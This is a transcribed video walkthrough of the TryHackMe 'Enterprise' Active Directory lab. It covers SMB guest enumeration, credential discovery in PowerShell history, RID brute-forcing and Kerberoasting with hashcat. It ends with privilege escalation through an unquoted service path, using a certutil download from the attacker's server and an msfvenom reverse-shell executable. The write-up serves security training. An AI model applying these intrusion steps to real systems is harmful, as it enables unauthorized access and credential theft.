What's going on, YouTube? Welcome back to another video. In today's video, we're doing Enterprise from TryHackMe, which is an Active Directory environment, and that's why it's rated at a hard difficulty. So I think, although this is a great box if you're just starting out in AD testing, you want to learn a couple new things, new tricks, and I definitely encourage you guys to go give it a try, play around with it a little bit. And so yeah, let's get right into it. All right, so the first thing that we can do when we're taking a look at a box is do an Nmap scan. I want to know what ports are open. I want to know what services are on those ports, what information I can gather from that scan. And I already did run a scan, and it was a full port scan so that we can get all that upfront information and the critical information, in my opinion, first, right? So let's do less enum all ports. So you can see this is the Nmap scan that I ran. I did default scripts, default versions. I also did a min rate of 10,000 just to make it a little bit quicker. And I just put it out to a output file so we can look at it like this. So we do have DNS. Now, just by taking a look at this, right? Active Directory, this looks like a domain controller, right? So this is an Active Directory instance, so it's not weird that that we're able to access this domain controller. Nonetheless, we do have DNS. We have port 80, HTTP. We have Kerberos, RPC. We have NetBIOS, LDAP, and a couple other ports here, SMB, secure LDAP, and we have a little more information down here from both RDP and from LDAP. So LDAP gives us the domain name, which is enterprise.thm, and we also have the fully qualified domain name right here, which is pretty cool. So let's go ahead and add this to our etc host file. So we could do sudo vi etc hosts, and then we can put in the IP address, and we can put in lab.enterprise.thm, and then enterprise.thm. And we can do this. So I like to do it like this in sort of like steps, just in case there's any problems with any tools that we end up running, although I don't think there will be. So the first thing I want to take a look at, right, is going to be the enumeration of the domain name. So like in the sense, if you couldn't get the domain name right from the Nmap scan, it's just a rare occurrence, right? If you couldn't get it from there, there's another way there's a couple other ways that you can do it. One way that you could do it was through LDAP search, right? Considering there is LDAP on the box. So we can do LDAP search like this. Let's do attack H just to look at the flags. We're going to use attack H, capital H for a URI. We're going to use attack X for simple authentication. We're going to use attack S to specify the scope, which is going to be base, and then we're going to specify a context, or the naming context, so we can get that information, right? So let's do LDAP search like this. Yep, tag H, and we can do LDAP : the IP address, and then we can do tag S, X, tag S, and we can do base naming contexts. Boom. And this is just another way to enumerate the domain names, all right? So this is the fully qualified domain name, FQDN, and then we have the domain right here. In the sense of trying to enumerate LDAP, at least for me, it didn't work in this environment for some reason. Maybe it's just me. But if somebody else has any ideas why it didn't work, that'd be fantastic. Go ahead and put it down in the comments below. And I want to take a look at that, right? Because I did try and do, like, for example, I tried something like this. B, and then we can grab this right here. We can go ahead and specify this. And then from here, right, it should have given us a bunch of information. This is the filter right here. This is the query. So object class of everything, and we're requesting all, right? Now this does say that in order to perform this operation, a successful bind must be completed in the connection. Now I don't know what that means. I could search this up possibly, right, and get information from that, see how that would work, or see if there's an issue that I can solve, like off the bat. But I just haven't looked at it in depth, at least. Although, nonetheless, I want to start with SMB, right? So we can do crack map exec, right? SMB. We could do enterprise.thm, and we can try null authentication. That means no username, no password, to see if it actually lets us into the share. And it says that it does, but if we add shares to this to see if we can enumerate any shares on the actual, server, we get a status access denied. So that's not going to work. But there is something else that we can try, something else that we can do, which is to add a user who does not exist into this flag right here, into the username flag. So we could do someone cool, right, with no password, and we get a return, right? So we get a return right here of all the files or all the directories within the share. Okay. So what's cool is that we have a users directory or a users folder, file, whatever, and we have a docs directory. So something we could do is look into these. These are not defaults, unlike these. So this was added by a user. So we can take a look at that. And this is something weird that Windows does that allows for, I think it's guest authentication, considering this person does not exist. So it just sort of like instead exchanges it with a guest account. So nonetheless, let's get through this. What we can do is there's a couple ways that we can enumerate this, right? Let's go with the first one, which is manually. So we could do SMB client, right? And we could do / enterprise.thm. And then we can we don't have to, we could do users. Now we don't have to specify any password here because remember, just like the enumeration of it that we just did with crackmap exec, this is not a valid user on the box. So we just provide our username with no password and we're able to log in. So we can do dir to list the directories. And we can see that this is a bunch of usernames. I mean, not all of them, but like lab admin, Bitbucket, alt Bitbucket, we have administrator. So these are a couple people that we can, this is at least a list that we can maybe copy like this, right? We can come down here and we can do cd loot, and we can do bi users like that, and we can like this, clean it up just like that, and then we can delete the ones that we know don't matter or don't exist, whatever, just like that, right? We can go ahead and escape this, save and quit it, and then what we can do is we can do cat users, and then we can awk tac f and with a space, and we can go and print the first field, and that'll give us usernames, right? So we can do that, and we can put that to users dot list. So now we have that, right? Awesome. So what we can do, right, is we can see if we can go into any of these directories, right? So we can do, let's try and list ls or dir administrator. Okay, access denied. Dir all atl bitbucket. Dir bitbucket. So it doesn't look like we can go into any of these except for one of them. So let's try dir lab admin like that. And we can actually see that we get a directory listing. So let's do cd lab admin. And now, if we look in here, this is the lab admin's directory or his user folder. And what we can see is we can go ahead and check desktop. Let's check his desktop if there's anything on there. There's nothing on there. Let's see if there's any anything in documents. And there's nothing here, right? The only thing that I can see that we can check out is this right here, app data. So we can go into cd app data. And there, through here, we can do roaming. Let's go to Microsoft. All right. So here we have a couple things, right? Let's see if there's any DP API credentials laying around. So we can do see there on credentials. There isn't. On protect. So there is a cred history, but don't think that there's anything in there. Try that. And there's nothing in there. So we can go back. So what can we do from here, right? There's no credentials lying in here that we can crack from, DP API credentials. Although something that we can do is, right, we can go into Windows, and inside Windows, there is a PowerShell directory. And in here, there is a PS readline module from PowerShell. So what this is basically like a bash underscore history file, or sort of service? No, not service, like functionality that allows for console logging, basically. So we can go cd ps readline, right? And in here, we have a console host history. So this is just like the bash history or ZSH history that you have on Linux. So we can do get console, or I mean, if we wanted to, we could do more on console hosts history. And we can see this. We can see that we can actually get a credential or a form of credentials from this folder. So we can see what they did. They went into the C drive, they created a folder, they went into the folder, they went back 3 times, and so all of this stuff is pretty irrelevant, although this is very important for us, right? So we can go ahead and copy that, and we can exit out of this. We can go into loot, and we can do, or actually, let's go into creds, and we can do VI creds, and we can do like that. Boom, now we have credentials. So this is a user called replication, right? So let's try that out. Enterprise.dhm, TACU, replication, like that. And then let's cat creds. We can grab this right here and we can try it out. Let's see. Like this. Let's see if this works. So we get a status log on failure. That means that this is not a valid credential for this user in particular, although we did find this in the lab admin directory, so we can try that. Let's try it with lab admin, like that. If I can spell, that'd be great. And boom, we do have a valid set of credentials. Although if we did try to list the shares again, it's not going to work. We don't have access to list the shares. We don't even have access to the share anymore. Although this is a valid credential, so this is another step in the right direction. So that being said, right, there's another way to grab this file. I wanted to show it. It's sort of a, how do you say it, an automated method, but we can do it through SMB map. Like this, we can do SMB map tac H to show what we're going to use. So we are going to use a tac H and a username of random and a password of nothing. And we're also going to do a tac R for the path. We can recursively list directories and files, right? And then we can actually download the file once it comes back, just like this. From here, using the F and then using download path. So it's pretty cool. I'm going to show it right now. Let's do SMB map, and we can do tac U with someone cool, tac P with nothing. We can do tac H and then enterprise.thm, R users, like that, and then lab, or actually do like that, and then we can do depth, and we can do 20. So this is going to go into the shares, right? Or go into the share, and it's going to traverse the directories or traverse the drives in there and list everything that is in there. So we can just literally take a look at it without actually having to go into all the files and folders and manually enumerate the entire thing, right? We can just get one big list of it. And so what I'm going to do is I'm going to pause the recording, and then I'm going to come back when it's finished. All right, so it just finished, and so what we can see, if we scroll up a little bit, right up here, we can see that it actually listed, this is an entire listing of everything that was in there, right? And if we come right down here, we can see that the file that we found comes out right here. So in this directory, we have the console host history, right? So we can grab this like that, and we can do this. We can specify download like this, and then we can put the file path console host history. Just letting you know, it's not my typo. This is their typo, or whoever created this box or whatever it was. Is just a weird little thing. But go ahead and copy that and paste it in that sense, and we can do this. Invalid path. Let's see. Let's try users like that. All right, there you go. And you see, we downloaded the file just like that, and we have it right here. So that's just another way that you can download the file, that you can enumerate the shares. It's just a cool method of doing that, right? And we can, if we cat this out, you can see that it's the same exact file, which is pretty cool. Now, the next thing that I want to do, right, is I want to make sure I have all the valid users on this box or on this domain. So one way that we can do that, right, is we can use RPC client. So considering that we have basically guest authentication and guest access to the share, I want to try RPC client with also guest authentication. Tag you like this with no one, and then we can go ahead and specify the IP address like this, right? And enter. And fantastic, we do have guest authentication or guest access to the RPC service. So what we can do is we can do help, right? And we can look up here. And right here, these queries are very important, right? We can do lookup SIDs first. So we can do look up SIDs, and we could do first, before that, we can do lookup names, administrator, right? We put a valid name of a username that we know, or of a user that we know is actually valid, and there's always going to be an administrator, right? And we can get his SID. So this is something important, right? Because what we can do is we can grab this just like this, and we can do lookup SIDs, paste this in, right? And we can literally just brute force this to get valid usernames, right? 2, 3. This is unknown. There's no one with that, with this SID or with this ID, right? User ID. What we can do, let's try 1000, right? Look, a machine username. So a better way to do this is going to be through lookup SIDs, the in-packet tool. So we do that, lookup sid.py, and then we can do lab.enterprise.thm, right? We can do this. We can put some guest with no password at the IP address. Oops. and grab the IP. And just like that, it's going to start brute forcing names, usernames, valid usernames. So we have all these valid usernames or valid users on the machine, on the box, just like that. And what we did there, right, what this script did for us was basically what I just showed you in RPC client. It's just it grabs the SID of the domain and it just brute forces the numbers on the side. And then when it responds, it just slaps it in there. And this is a valid username or user on the box. So we can do, right? Grab this like this, copy, right? Let's go. We could do cd loot and then we can do vi users. Let's do that again. Let's delete everything in here like that, right? And we can quit that. We could do cat users, right? Now that's everything. And we can do in order to clean this up, we can do awk f, and then we can a colon like that. We could do this print dollar, I think it's 2. Let's see what that does. All right, cool. We can, there you go. Now we can do like this. We can awk it again. Terrible method, but if it works, it works, right? And like this, there's definitely a better way to do this, but whatever, I'm gonna make it work. I think 2, like that. There you go. And we can do one last one. Please, someone tell me a better way to do this. For a space and print 1. There you go. Now we have all the users. We can output that to a file. Usernames.list. Now we can go into that vi usernames.list. And we can go ahead and just clean this up a little bit. We know this is not going to work. That. Just clean it up. We know things. We know users or actual users on the box. These are like Adobe subscription. You know, these are sensitive. These are actually accounts. Not this. Not this. Not this. Not this. And we could just clean it up a little bit. Just get real accounts. All right, cool. So that looks good. Now what we can do, right, is we close this out, save that. So now we have a list of valid usernames or valid users on the box. So the next thing that I want to do, right, is I want to check out that HTTP server, right, that web server. So there was one on 80, and then there was a couple on like 7990, 59 something there, and then we can do this. All right. So we have enterprise domain controller. Please keep out. If we do this, there's nothing there, so it doesn't look like this is even. There's no CMS here. There's no actual web page. It's just like one file. So that's not going to be of use. Let's see what are the other. We do less. Enum all ports. All right, we have 80, so that was that one. That was an IIS server. We have this one, 5357. Let's see. 5357. Service unavailable. All right. 5985. There's nothing there. This is another IIS server. HP. Okay, so this looks like an actual HTTP server, something that we can actually look at. So let's try 7990. All right, so navigating to this, it's pretty cool. We have an Atlassian login page, and let's see, is there any actual functionality to this? No. So this, you can see in the bottom left, it just brings you to the actual Atlassian login reset page, and this does it as well. This as well, and this as well. So it doesn't look like there's actually anything that we can like really look into here. What we can do is we can take a look at this. So reminder to all enterprise THM employees, we're moving to GitHub. So my thought after this was to do a quick OSINT Google search, something cool that we can try. So we can go to google.com, right? And we can do, let's try, make this a little bigger. We could do site:/github.com, and then we can put in quotes enterprise.thm, just like that. So it comes back with a couple things. We have enterprise.thm, we have enterprise THM about us, and Nick enterprise dev. So we can do this, go ahead and open these up. We can come in here, we can check this out. About us, we have this readme, and we have 2 commits. Let's see, is there update? Okay, there's nothing, doesn't look like there's really anything here. We can go to, this is the same one. So we can come here to Nick Enterprise Dev. He's part of enterprise.thm. And then if you remember, we can actually cat out the username file, right, that we had. And we can see here that Nick is actually a person, or actually a valid user on the box, right? So we can come in here, we can go to the management script, right? And we can see what he put in here. So this looks like adding a user credential to, or doing some type of configuration to the Active Directory domain. But if we come here to the history section, we can see that he updated something a little while back. So we can come in here and we can see right here that he added his username and his password right here under this update commit, right under this commit. So what we can do from here, which is pretty cool, is we can go here and we can try a type of curb roasting attack, right? We can try get not get user SPNs, right? And we can do lab. Let's do enterprise.thm. We can do Nick and then his password of toasty boy, and then I think it's 1 exclamation point. We could do DCIP and let me grab that. We can then get the IP and we can do tech request like that. And boom, we have a Kerberos hash here that we can use, or we can crack, and then hopefully attempt to get the password for this service account, right? So we can grab this hash right here, like this, copy it, and we can do vi hash, set paste, and then enter like that. And then we can do hashcat, right? Tech M 13100, and we could do hash and opt rock you force, because I am in a VM. So we can do this, and boom, we have it cracked almost instantly. So we have this password of little red bucket. All right, Now, we do have another set of credentials, so let's see if it's actually valid, right? So we can do CMB, SMB, and then we can do enterprise.thm, and we can do U, bit, bucket, P, like that, and we can see if this is a valid account. Boom, it is. Awesome. So we don't have pwned, so it's not an admin account. We don't have like WinRM privileges, but we do have, let's see, actually, let's see, I haven't actually checked it. Okay, we don't have WinRM privileges. Let's see, can we do RDP? And taking a little bit of time. All right, cool. So we do have RDP privileges to the box. So what we can do is you can do X free RDP, right? I have Ramina or Ramina. There you go. So I have this. It's just another like RDP tool, but I mean, I enjoy it. It's pretty cool. Although you can just use X free RDP if you really wanted to. So we can do this. We can grab the IP address, click yes. You can do bit bucket, right? Little red bucket. The domain, lab.enter THM, and we can connect to the box. Awesome. And we're on the box. Pretty cool. So let's make this bigger. And so here you have the user.txt. This is where you can find it on Bitbucket's desktop. Another thing that you possibly could have done to get this is just use the SMB server to go into his directory or log in with his credentials, go into his directory, grab the user.txt. That's another way that you could have done it. Although you're going to need to have an actual shell on the box or access to it in order to do the next step, the privilege escalation, right? So first thing I want to do, right, is open here, CMD. We can get a command prompt. And we have this command prompt right here. Let's open it up and let's make it a little bit bigger. Let's do, there you go, that's fine. So we can take a look at what's going on in the backend, and we can see, all right, so with this, we have the Atlassian directory, we have inetpub, which is the web servers, so we can check in there if we want to. There's nothing. It's literally just one index.html file. We can go in inetpub. This is the same exact things. We can go into root. And then we can type robots.txt and then check it out. Why would robots.txt exist on a domain controller's web server? So cool. We can go back, right? That's not the intended method. We can come back and we can check in, or like when I was first doing this box, I was just looking through everything, right? I was looking through the different directories, doing a lot of manual enumeration. We can get in the habit of doing ipconfig, and we can see that we are on this box, right? And we can do system info, and we can grab the system info. We can also see what privileges we have, right? So we can do net user, we can do who am I / all, and we can see all these privileges right here. So there's nothing that really sticks out as sort of exploitable or privilege escalatable. Nonetheless, there's nothing here that we could have done, at least in my experience. I'm sure that there is something that there's always another way to do things, right? But we can see here that we're a part of all these groups, and one of them happens to be built-in users, which is cool. And I feel like every user on the box is part of built-in users, but this is going to come in handy, so remember it. So let's do something here, right? We can let's go ahead and grab power up, a sort of privilege escalation script that's going to allow us to sort of see what vectors that we can utilize to get admin on the box, right? So let's do cd into what was it? Users, c:\users, and then Bitbucket and documents. All right. Have nothing in here. Fantastic. So let's go ahead and grab that. We can bring it down a little bit. Come back here and oops. So let's do locate power up.ps1. I have it right here. Can grab this. We can copy opt, or we can just do this. And then here. That didn't work. All right. Got that there. Cool. Now we can do Python 3, TAC-M, HTTP server, like that, and then just throw that up on port 80. Come in here, and we can do cert util.exe, TAC URL cache, TAC F, and we can specify HTTP and then RIP address 7, and then power up.ps1, and we can name it power up.ps1, just like that. So it's going to turn up, this is going to turn on the cert util like utility, and then we can grab that file from our web server. All right, so once you have the PowerShell script uploaded, all you got to do is do import. We're going to do import module. We're going to do /powerup like that. And then we're going to do invoke all checks. So it's going to come up with, it's going to go ahead and check for any escalation path throughout the system. And boom, it comes back with a bunch. So this is an unquoted service path vulnerability. And this is very good for us because it's actually pretty easy. Although this means that we can hijack, we can include our own malicious executable in this path right here of this service, because there is no quotes within this service path. That means that everything here, right? Every word, when I go to start this service, for example, every word in here is going to have .exe appended to it, and it's going to try and be run by Windows once it goes through the start process, right? So what we can do is we can come into this directory right here, put our own 0tier.exe that gives us a reverse shell, and have it executed by local system or NT authority system or the administrator, and then get a reverse shell like that, or get privilege escalation like that. So this is something cool. We can actually take advantage of this. Now, if you didn't have access to this power up script, what you could do also is we can come through here, right? And we can clear the screen, and we could do something like this. Let's say if you went into, let's say you were doing some enumeration, right? You went into this, you went into program files, and then like this. And let's say you saw 0tier, this random service, right? You know this is not a normal like executable. This is something that someone put there, right? And so you wanted to see if there was an actual service behind it. So what we can do, right, is we can do SC, or actually let's exit this, go back into CMD. We could do SC query EX, and then we could do type service, and we can do status or state, sorry, all. like that. And this is going to show you all the services on the machine. So if we come through here, we can scroll up, scroll up. We can look at all the services. And let's see if we can find it. And here it is. Look at this. Service name, 0 tier 1 service. So then you see this. All right, cool. So there is a 0 tier 1 file or supposedly executable, right? Or software, whatever it is. And then there's a service that runs it. So fantastic. Now let's see. Let's clear this, right? And let's do SCQC, a service query. And then we could do 0 tier 1 service, like that. And boom, we can see the binary path name is unquoted. So we can actually grab this, right? Like this, copy that. And we could do iCackles on this. And we can see here that built-in users, which is basically anybody on the box, has write access to this directory, and it's running as local system. So this is perfect, right? And let's go ahead and execute this. Let's do PowerShell again, if I can spell. Let's do cdc : program files. Actually, yeah, program files. Let's do 0 tier 1. And then in here, right, we can go in here. So in here is where the actual executable of the legitimate process or the legitimate service is, right? So we can clear the screen here and we can do cert util.exe URL cache f http our IP address, and then we can go ahead and come back here to our terminal and we can do MSF console MSF Venom, right? Tag P Windows x64 shell reverse TCP lhost. We can do 10.11 72.87 and 87, and then L port of 9999, for example, right? We could do a format of an exe and an output of 0 tier.exe, just like that. So we have that here. We can move this into Reds, where our server is at. And we can grab this file, this 0, like this, tier.exe, and then we could do 0 tier.exe, put that in here. There it is. Oh, oops. Let's move 0 tier to c:/program files 0 like that. Let's move it there, and then let's cd into this. We don't really need to, but whatever. cd into this. Here it is. So you can see that we are taking control. Since Windows will go 0 tier.exe, it's going to go ahead and execute our malicious payload. And so what we can do, let's go back to the terminal, close this out. Let's do ncat nlvp. We can do 9999, just like that. Close this out. Hello, like that. Go back here, and we could do stop service 0 tier 1 service. And we could do start service service. There you go. So this is stopping the service, and then we're restarting it with this executable. 0 tier 1 service. And if we run this, we should have a shell in the box. So we could do who am I? Who am I? We are NT authority system, and we could do cd users administrator desktop, and we can see root.txt. So that is the box. I'm sure that there's other ways to do this. Guaranteed, let me know any other way that you guys find. Go ahead and play around with this. This is a pretty cool and vulnerable environment. And yeah, I just thought it was a cool box. Thank you guys for watching, and I'll see you guys in the next one.